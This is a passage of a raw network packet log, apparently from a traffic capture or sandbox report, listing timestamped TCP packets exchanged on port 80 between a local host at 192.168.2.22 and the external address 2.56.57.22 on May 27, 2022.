May 27, 2022 12:02:27.282751083 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282761097 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282774925 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282778978 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282799006 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282805920 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282824993 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282830954 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282847881 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282855988 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282871008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282871962 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282903910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.283163071 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.287540913 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287575006 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287596941 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287621975 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287648916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287658930 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.287669897 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287676096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.287683964 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.287694931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287703991 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.287719965 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.287722111 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.287751913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.288206100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.288938046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.288966894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.288990974 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.289014101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289016008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.289022923 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289026022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289040089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.289052963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289064884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.289069891 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289088011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289089918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.289098978 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.289119959 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.311985970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312021971 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312046051 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312069893 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312093973 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312117100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312122107 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312139034 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312141895 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312156916 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312163115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312171936 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312186003 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312189102 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312211037 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312221050 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312235117 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312237024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312258959 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312266111 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312283993 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312289953 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312313080 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312328100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312338114 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312344074 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312364101 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312372923 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312387943 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312395096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312412977 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312418938 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312438011 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312444925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312463045 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312469959 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312503099 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312504053 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312531948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312539101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312555075 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312562943 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312581062 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312589884 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312603951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312618017 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312629938 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312634945 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312654018 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312664032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312678099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312681913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312702894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312711000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312726974 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312732935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312752008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312758923 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312777042 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312787056 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312800884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.312808990 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.312833071 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314485073 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314518929 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314543009 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314568043 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314590931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314594030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314605951 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314609051 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314614058 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314616919 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314639091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314644098 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314662933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314670086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314687014 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314694881 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314712048 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314718962 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314737082 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314743042 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314760923 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314766884 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314784050 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314793110 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314809084 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314815044 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314832926 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314840078 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314858913 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.314867973 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.314889908 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315749884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315778971 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315804005 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315817118 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315825939 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315830946 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315849066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315857887 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315881014 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315887928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315906048 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315912962 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315928936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315941095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315953970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315957069 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.315979958 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.315985918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.316004038 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.316014051 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.316029072 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.316037893 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.316052914 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.316060066 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.316076040 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.316097021 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.316108942 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339730978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339767933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339793921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339814901 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339816093 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339831114 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339838982 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339849949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339864016 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339873075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339890957 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339905024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339914083 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339939117 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339940071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339958906 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339962959 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339982986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.339987040 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.339998007 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340010881 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340018988 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340034962 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340040922 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340059996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340065956 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340082884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340096951 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340106964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340115070 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340131998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340135098 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340157032 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340164900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340182066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340183973 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340209007 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340219975 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340233088 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340245008 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340257883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340264082 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340281963 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340291023 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340307951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340310097 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340332985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340344906 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340357065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340364933 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340382099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340384007 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340409040 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340419054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340434074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340440035 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340459108 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340466022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340495110 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340500116 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340523958 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340538025 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340548038 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340572119 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340579033 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340595961 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340620995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340643883 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340646982 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340663910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340670109 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340682030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340693951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340701103 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340718985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340738058 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340742111 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340751886 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340769053 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340774059 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340792894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340805054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340816975 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340822935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340841055 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340851068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340866089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340871096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340892076 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340903044 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340915918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340919971 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340940952 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340950966 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340965986 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.340970993 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.340990067 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341000080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341015100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341018915 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341038942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341049910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341063023 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341067076 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341089010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341101885 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341111898 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341120958 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341136932 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341140032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341161966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341173887 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341186047 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341191053 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341212034 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341221094 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341236115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341242075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341259956 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341270924 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341284990 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341289043 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341309071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341321945 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341334105 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341340065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341358900 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341367960 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341396093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341597080 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341620922 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341645002 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341646910 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341661930 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341670036 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341686010 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341692924 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341703892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341717958 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341725111 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341742039 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341754913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341766119 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341773987 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341790915 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341794014 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341815948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341828108 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341841936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341847897 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341866016 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341876030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341890097 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341896057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341914892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341924906 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341938972 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341943979 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341964960 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341974974 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.341989040 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.341994047 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342014074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342024088 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342037916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342042923 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342061996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342072964 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342086077 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342102051 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342109919 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342122078 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342133999 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342140913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342159033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342170000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342183113 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342189074 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342206955 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342217922 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342231035 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342237949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342255116 CEST	80	49171	2.56.57.22	192.168.2.22
